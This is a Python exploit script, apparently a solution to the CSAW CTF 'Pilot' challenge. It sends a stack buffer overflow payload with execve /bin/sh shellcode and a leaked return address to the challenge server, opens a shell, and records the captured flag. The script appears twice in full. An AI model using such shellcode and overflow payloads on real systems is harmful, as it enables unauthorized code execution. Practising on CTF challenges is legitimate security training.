faidamine/Pilot_pwn75.py

## Pilot_pwn75.py
#usr/bin/python

#Faid Mohammed Amine
#Fb : piratuer

from pwn import *

con = remote('pwn.chal.csaw.io',8464)

con.recvuntil("Location:")
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

payload = ""
payload += shellcode
payload += 'A'*(40-len(shellcode))
payload += p64(int(con.recvline().strip(),16))
con.sendline(payload)


con.interactive()

#flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys}
	#usr/bin/python

	#Faid Mohammed Amine
	#Fb : piratuer

	from pwn import *

	con = remote('pwn.chal.csaw.io',8464)

	con.recvuntil("Location:")
	shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"

	payload = ""
	payload += shellcode
	payload += 'A'*(40-len(shellcode))
	payload += p64(int(con.recvline().strip(),16))
	con.sendline(payload)


	con.interactive()

	#flag{1nput_c00rd1nat3s_Strap_y0urse1v3s_1n_b0ys}